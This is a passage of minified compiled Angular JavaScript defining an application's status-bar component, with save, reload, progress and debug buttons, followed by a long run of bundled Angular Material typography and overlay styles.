e=B();C(10),ri("color",null!=e.dataService.Project&&e.dataService.Project.FileChanged||null!=e.dataService.Config&&e.dataService.Config.FileChanged?"yellow":"white"),C(1),ke(e.dataService.HasProject?null==e.dataService.Project?null:e.dataService.Project.Name:null==e.dataService.Config?null:e.dataService.Config.Name),C(3),V("ngIf",null==e.dataService.SelectedFile?null:e.dataService.SelectedFile.isEncrypted),C(2),V("ngIf",!(null!=e.dataService.SelectedFile&&e.dataService.SelectedFile.isEncrypted)),C(2),at("matTooltip",re(19,14,"status-bar.TasksAndNotes")),V("disabled",!e.dataService.HasProject),C(7),at("matTooltip",re(26,16,"status-bar.ConsistencyCheck")),C(7),at("matTooltip",re(33,18,"general.Save")),V("disabled",!e.dataService.CanSaveFile),C(7),at("matTooltip",re(40,20,"general.SaveAs")),C(7),V("ngIf",e.dataService.HasProject),C(2),V("ngIf",!e.dataService.HasProject),C(2),at("matTooltip",e.dataService.HasProject?"general.ReloadProject":re(51,22,"general.ReloadConfig"))}}function ect(t,a){if(1&t&&(m(0,"span"),s(1),u()),2&t){const e=B();C(1),ke(e.GetProgress())}}function tct(t,a){1&t&&(m(0,"span"),s(1,"-"),u())}function ict(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",17),he("click",function(){return be(e),Me(B().dataService.Debug3())}),s(3,"\n      "),m(4,"mat-icon",2),s(5,"bug_report"),u(),s(6,"\n    "),u(),s(7,"\n    "),m(8,"button",18),he("click",function(){return be(e),Me(B().dataService.Debug2())}),s(9,"\n      "),m(10,"mat-icon",2),s(11,"bug_report"),u(),s(12,"\n    "),u(),s(13,"\n    "),m(14,"button",18),he("click",function(){return be(e),Me(B().dataService.Debug())}),s(15,"\n      "),m(16,"mat-icon",2),s(17,"bug_report"),u(),s(18,"\n    "),u(),s(19,"\n  "),Mt()}}let _f=(()=>{class t{constructor(e,i,n,r,c){this.messagesService=e,this.dataService=i,this.dialogService=n,this.locStorage=r,this.translate=c,this.faCodeBranch=Z5,this.showDebug=!1}ngOnInit(){this.version=hf_i}GetProgress(){if(this.dataService.Project){let e=Object.values(this.dataService.Project.ProgressTracker);return 0==e.length?"0%":(100*e.filter(i=>1==i).length/e.length).toFixed(0)+"%"}}ShowDebugBtns(){this.showDebug=!this.showDebug}OpenChangelog(){this.dialogService.OpenChangelogDialog()}}return t.\u0275fac=function(e){return new(e||t)(Ee(A2),Ee(Yi),Ee(Wn),Ee(_r),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-status-bar"]],decls:40,vars:15,consts:[[1,"status-bar","background-color-primary"],["mat-icon-button","","tourAnchor","message-history","matTooltipShowDelay","1000",1,"statusBtn",2,"margin-left","10px",3,"matTooltip","click"],[1,"iconBtn"],[2,"font-size","small"],[4,"ngIf"],["mat-icon-button","","tourAnchor","set-progress",1,"statusBtn",2,"margin-left","20px",3,"click"],[1,"buttonAsText","statusBtn",2,"float","right","margin-right","5px",3,"click"],[1,"buttonAsText",2,"cursor","auto","float","right","margin-right","5px","width","30px","height","18px",3,"click"],[1,"iconBtn","material-icons-outlined"],["mat-icon-button","",1,"statusBtn",2,"margin-left","20px",3,"click"],[1,"buttonAsText","statusBtn",3,"click"],["mat-icon-button","","class","statusBtn","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","class","statusBtn","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"statusBtn",2,"margin-left","5px",3,"disabled","matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",1,"statusBtn",3,"matTooltip","click"],["mat-icon-button","","tourAnchor","save-file","matTooltipShowDelay","1000",1,"statusBtn",3,"disabled","matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",1,"statusBtn",3,"disabled","matTooltip","click"],["mat-icon-button","",1,"statusBtn",2,"float","right","margin-right","40px",3,"click"],["mat-icon-button","",1,"statusBtn",2,"float","right","margin-right","5px",3,"click"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"button",1),he("click",function(){return i.messagesService.ShowHistory()}),oe(3,"translate"),s(4,"\n    "),m(5,"mat-icon",2),s(6,"error_outline"),u(),m(7,"span",3),s(8),u(),s(9," \n    "),m(10,"mat-icon",2),s(11,"warning_amber"),u(),m(12,"span",3),s(13),u(),s(14,"\n    "),ne(15,Qst,4,1,"ng-container",4),s(16,"\n    "),ne(17,$st,4,1,"ng-container",4),s(18,"\n  "),u(),s(19,"\n  \n  "),ne(20,Zst,57,24,"ng-container",4),s(21,"\n  "),m(22,"button",5),he("click",function(){return i.dialogService.OpenProgresstrackerDialog()}),s(23,"\n    "),m(24,"mat-icon",2),s(25,"trending_up"),u(),s(26),oe(27,"translate"),ne(28,ect,2,1,"span",4),ne(29,tct,2,0,"span",4),s(30,"\n  "),u(),s(31,"\n  "),m(32,"button",6),he("click",function(){return i.OpenChangelog()}),s(33),u(),s(34,"\n  "),m(35,"button",7),he("click",function(){return i.ShowDebugBtns()}),s(36,"\n  "),u(),s(37,"\n  "),ne(38,ict,20,0,"ng-container",4),s(39,"\n"),u()),2&e&&(C(2),at("matTooltip",re(3,11,"status-bar.messages")),C(6),ke(i.messagesService.ErrorMsgs.length),C(5),ke(i.messagesService.WarningMsgs.length),C(2),V("ngIf",i.messagesService.ShowSuccesses),C(2),V("ngIf",i.messagesService.ShowInfos),C(3),V("ngIf",i.dataService.Project||i.dataService.Config),C(6),ct("",re(27,13,"status-bar.progress"),": "),C(2),V("ngIf",i.dataService.Project),C(1),V("ngIf",!i.dataService.Project),C(4),ct("\n    v",i.version,"\n  "),C(5),V("ngIf",i.showDebug))},dependencies:[Ri,qq,oa,da,Pa,Xi],styles:['.mat-badge-content[_ngcontent-%COMP%]{font-weight:600;font-size:12px;font-family:Roboto,Helvetica Neue,sans-serif}.mat-badge-small[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{font-size:9px}.mat-badge-large[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{font-size:24px}.mat-h1[_ngcontent-%COMP%], .mat-headline[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-headline[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h1[_ngcontent-%COMP%]{font:400 24px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h2[_ngcontent-%COMP%], .mat-title[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-title[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h2[_ngcontent-%COMP%]{font:500 20px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h3[_ngcontent-%COMP%], .mat-subheading-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h3[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-subheading-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h3[_ngcontent-%COMP%]{font:400 16px/28px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h4[_ngcontent-%COMP%], .mat-subheading-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h4[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-subheading-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h4[_ngcontent-%COMP%]{font:400 15px/24px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h5[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h5[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h5[_ngcontent-%COMP%]{font:400 11.62px/20px Roboto,Helvetica Neue,sans-serif;margin:0 0 12px}.mat-h6[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-h6[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   h6[_ngcontent-%COMP%]{font:400 9.38px/20px Roboto,Helvetica Neue,sans-serif;margin:0 0 12px}.mat-body-strong[_ngcontent-%COMP%], .mat-body-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body-strong[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body-2[_ngcontent-%COMP%]{font:500 14px/24px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-body[_ngcontent-%COMP%], .mat-body-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-body[_ngcontent-%COMP%]   p[_ngcontent-%COMP%], .mat-body-1[_ngcontent-%COMP%]   p[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body[_ngcontent-%COMP%]   p[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-body-1[_ngcontent-%COMP%]   p[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   p[_ngcontent-%COMP%]{margin:0 0 12px}.mat-small[_ngcontent-%COMP%], .mat-caption[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-small[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-caption[_ngcontent-%COMP%]{font:400 12px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-display-4[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-display-4[_ngcontent-%COMP%]{font:300 112px/112px Roboto,Helvetica Neue,sans-serif;letter-spacing:-.05em;margin:0 0 56px}.mat-display-3[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-display-3[_ngcontent-%COMP%]{font:400 56px/56px Roboto,Helvetica Neue,sans-serif;letter-spacing:-.02em;margin:0 0 64px}.mat-display-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-display-2[_ngcontent-%COMP%]{font:400 45px/48px Roboto,Helvetica Neue,sans-serif;letter-spacing:-.005em;margin:0 0 64px}.mat-display-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]   .mat-display-1[_ngcontent-%COMP%]{font:400 34px/40px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 64px}.mat-bottom-sheet-container[_ngcontent-%COMP%]{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-button[_ngcontent-%COMP%], .mat-raised-button[_ngcontent-%COMP%], .mat-icon-button[_ngcontent-%COMP%], .mat-stroked-button[_ngcontent-%COMP%], .mat-flat-button[_ngcontent-%COMP%], .mat-fab[_ngcontent-%COMP%], .mat-mini-fab[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:500}.mat-button-toggle[_ngcontent-%COMP%], .mat-card[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-card-title[_ngcontent-%COMP%]{font-size:24px;font-weight:500}.mat-card-header[_ngcontent-%COMP%]   .mat-card-title[_ngcontent-%COMP%]{font-size:20px}.mat-card-subtitle[_ngcontent-%COMP%], .mat-card-content[_ngcontent-%COMP%]{font-size:14px}.mat-checkbox[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-checkbox-layout[_ngcontent-%COMP%]   .mat-checkbox-label[_ngcontent-%COMP%]{line-height:24px}.mat-chip[_ngcontent-%COMP%]{font-size:14px;font-weight:500}.mat-chip[_ngcontent-%COMP%]   .mat-chip-trailing-icon.mat-icon[_ngcontent-%COMP%], .mat-chip[_ngcontent-%COMP%]   .mat-chip-remove.mat-icon[_ngcontent-%COMP%]{font-size:18px}.mat-table[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-header-cell[_ngcontent-%COMP%]{font-size:12px;font-weight:500}.mat-cell[_ngcontent-%COMP%], .mat-footer-cell[_ngcontent-%COMP%]{font-size:14px}.mat-calendar[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-calendar-body[_ngcontent-%COMP%]{font-size:13px}.mat-calendar-body-label[_ngcontent-%COMP%], .mat-calendar-period-button[_ngcontent-%COMP%]{font-size:14px;font-weight:500}.mat-calendar-table-header[_ngcontent-%COMP%]   th[_ngcontent-%COMP%]{font-size:11px;font-weight:400}.mat-dialog-title[_ngcontent-%COMP%]{font:500 20px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-expansion-panel-header[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:15px;font-weight:400}.mat-expansion-panel-content[_ngcontent-%COMP%]{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-form-field[_ngcontent-%COMP%]{font-size:inherit;font-weight:400;line-height:1.125;font-family:Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-form-field-wrapper[_ngcontent-%COMP%]{padding-bottom:1.34375em}.mat-form-field-prefix[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%], .mat-form-field-suffix[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{font-size:150%;line-height:1.125}.mat-form-field-prefix[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%], .mat-form-field-suffix[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%]{height:1.5em;width:1.5em}.mat-form-field-prefix[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%], .mat-form-field-suffix[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{height:1.125em;line-height:1.125}.mat-form-field-infix[_ngcontent-%COMP%]{padding:.5em 0;border-top:.84375em solid transparent}.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.34375em) scale(.75);width:133.3333333333%}.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.34374em) scale(.75);width:133.3333433333%}.mat-form-field-label-wrapper[_ngcontent-%COMP%]{top:-.84375em;padding-top:.84375em}.mat-form-field-label[_ngcontent-%COMP%]{top:1.34375em}.mat-form-field-underline[_ngcontent-%COMP%]{bottom:1.34375em}.mat-form-field-subscript-wrapper[_ngcontent-%COMP%]{font-size:75%;margin-top:.6666666667em;top:calc(100% - 1.7916666667em)}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-wrapper[_ngcontent-%COMP%]{padding-bottom:1.25em}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]{padding:.4375em 0}.mat-form-field-appearance-legacy.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.001px);width:133.3333333333%}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-form-field-autofill-control[_ngcontent-%COMP%]:-webkit-autofill + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.00101px);width:133.3333433333%}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.00102px);width:133.3333533333%}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{top:1.28125em}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{bottom:1.25em}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-subscript-wrapper[_ngcontent-%COMP%]{margin-top:.5416666667em;top:calc(100% - 1.6666666667em)}@media print{.mat-form-field-appearance-legacy.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28122em) scale(.75)}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-form-field-autofill-control[_ngcontent-%COMP%]:-webkit-autofill + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28121em) scale(.75)}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.2812em) scale(.75)}}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]{padding:.25em 0 .75em}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{top:1.09375em;margin-top:-.5em}.mat-form-field-appearance-fill.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-fill.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-.59375em) scale(.75);width:133.3333333333%}.mat-form-field-appearance-fill.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-.59374em) scale(.75);width:133.3333433333%}.mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]{padding:1em 0}.mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{top:1.84375em;margin-top:-.25em}.mat-form-field-appearance-outline.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-outline.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.59375em) scale(.75);width:133.3333333333%}.mat-form-field-appearance-outline.mat-form-field-can-float[_ngcontent-%COMP%]   .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.59374em) scale(.75);width:133.3333433333%}.mat-grid-tile-header[_ngcontent-%COMP%], .mat-grid-tile-footer[_ngcontent-%COMP%]{font-size:14px}.mat-grid-tile-header[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%], .mat-grid-tile-footer[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-grid-tile-header[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2), .mat-grid-tile-footer[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:12px}input.mat-input-element[_ngcontent-%COMP%]{margin-top:-.0625em}.mat-menu-item[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:400}.mat-paginator[_ngcontent-%COMP%], .mat-paginator-page-size[_ngcontent-%COMP%]   .mat-select-trigger[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:12px}.mat-radio-button[_ngcontent-%COMP%], .mat-select[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-select-trigger[_ngcontent-%COMP%]{height:1.125em}.mat-slide-toggle-content[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-slider-thumb-label-text[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:12px;font-weight:500}.mat-stepper-vertical[_ngcontent-%COMP%], .mat-stepper-horizontal[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-step-label[_ngcontent-%COMP%]{font-size:14px;font-weight:400}.mat-step-sub-label-error[_ngcontent-%COMP%]{font-weight:400}.mat-step-label-error[_ngcontent-%COMP%]{font-size:14px}.mat-step-label-selected[_ngcontent-%COMP%]{font-size:14px;font-weight:500}.mat-tab-group[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-tab-label[_ngcontent-%COMP%], .mat-tab-link[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:500}.mat-toolbar[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h1[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h2[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h3[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h4[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h5[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   h6[_ngcontent-%COMP%]{font:500 20px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0}.mat-tooltip[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:10px;padding-top:6px;padding-bottom:6px}.mat-tooltip-handset[_ngcontent-%COMP%]{font-size:14px;padding-top:8px;padding-bottom:8px}.mat-list-item[_ngcontent-%COMP%], .mat-list-option[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{font-size:16px}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:14px}.mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]{font-size:16px}.mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:14px}.mat-list-base[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:500}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]{font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]   .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:12px;font-weight:500}.mat-option[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:16px}.mat-optgroup-label[_ngcontent-%COMP%]{font:500 14px/24px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-simple-snackbar[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px}.mat-simple-snackbar-action[_ngcontent-%COMP%]{line-height:1;font-family:inherit;font-size:inherit;font-weight:500}.mat-tree[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-tree-node[_ngcontent-%COMP%], .mat-nested-tree-node[_ngcontent-%COMP%]{font-weight:400;font-size:14px}.mat-ripple[_ngcontent-%COMP%]{overflow:hidden;position:relative}.mat-ripple[_ngcontent-%COMP%]:not(:empty){transform:translateZ(0)}.mat-ripple.mat-ripple-unbounded[_ngcontent-%COMP%]{overflow:visible}.mat-ripple-element[_ngcontent-%COMP%]{position:absolute;border-radius:50%;pointer-events:none;transition:opacity,transform 0ms cubic-bezier(0,0,.2,1);transform:scale3d(0,0,0)}.cdk-high-contrast-active[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{display:none}.cdk-visually-hidden[_ngcontent-%COMP%]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;white-space:nowrap;outline:0;-webkit-appearance:none;-moz-appearance:none;left:0}[dir=rtl][_ngcontent-%COMP%]   .cdk-visually-hidden[_ngcontent-%COMP%]{left:auto;right:0}.cdk-overlay-container[_ngcontent-%COMP%], .cdk-global-overlay-wrapper[_ngcontent-%COMP%]{pointer-events:none;top:0;left:0;height:100%;width:100%}.cdk-overlay-container[_ngcontent-%COMP%]{position:fixed;z-index:1000}.cdk-overlay-container[_ngcontent-%COMP%]:empty{display:none}.cdk-global-overlay-wrapper[_ngcontent-%COMP%]{display:flex;position:absolute;z-index:1000}.cdk-overlay-pane[_ngcontent-%COMP%]{position:absolute;pointer-events:auto;box-sizing:border-box;z-index:1000;display:flex;max-width:100%;max-height:100%}.cdk-overlay-backdrop[_ngcontent-%COMP%]{position:absolute;inset:0;z-index:1000;pointer-events:auto;-webkit-tap-highlight-color:transparent;transition:opacity .4s cubic-bezier(.25,.8,.25,1);opacity:0}.cdk-overlay-backdrop.cdk-overlay-backdrop-showing[_ngcontent-%COMP%]{opacity:1}.cdk-high-contrast-active[_ngcontent-%COMP%]   .cdk-overlay-backdrop.cdk-overlay-backdrop-showing[_ngcontent-%COMP%]{opacity:.6}.cdk-overlay-dark-backdrop[_ngcontent-%COMP%]{background:rgba(0,0,0,.32)}.cdk-overlay-transparent-backdrop[_ngcontent-%COMP%]{transition:visibility 1ms linear,opacity 1ms linear;visibility:hidden;opacity:1}.cdk-overlay-transparent-backdrop.cdk-overlay-backdrop-showing[_ngcontent-%COMP%]{opacity:0;visibility:visible}.cdk-overlay-backdrop-noop-animation[_ngcontent-%COMP%]{transition:none}.cdk-overlay-connected-position-bounding-box[_ngcontent-%COMP%]{position:absolute;z-index:1000;display:flex;flex-direction:column;min-width:1px;min-height:1px}.cdk-global-scrollblock[_ngcontent-%COMP%]{position:fixed;width:100%;overflow-y:scroll}textarea.cdk-textarea-autosize[_ngcontent-%COMP%]{resize:none}textarea.cdk-textarea-autosize-measuring[_ngcontent-%COMP%]{padding:2px 0!important;box-sizing:content-box!important;height:auto!important;overflow:hidden!important}textarea.cdk-textarea-autosize-measuring-firefox[_ngcontent-%COMP%]{padding:2px 0!important;box-sizing:content-box!important;height:0!important}@keyframes cdk-text-field-autofill-start{}@keyframes cdk-text-field-autofill-end{}.cdk-text-field-autofill-monitored[_ngcontent-%COMP%]:-webkit-autofill{animation:cdk-text-field-autofill-start 0s 1ms}.cdk-text-field-autofill-monitored[_ngcontent-%COMP%]:not(:-webkit-autofill){animation:cdk-text-field-autofill-end 0s 1ms}.mat-focus-indicator[_ngcontent-%COMP%]{position:relative}.mat-focus-indicator[_ngcontent-%COMP%]:before{inset:0;position:absolute;box-sizing:border-box;pointer-events:none;display:var(--mat-focus-indicator-display, none);border:var(--mat-focus-indicator-border-width, 3px) var(--mat-focus-indicator-border-style, solid) 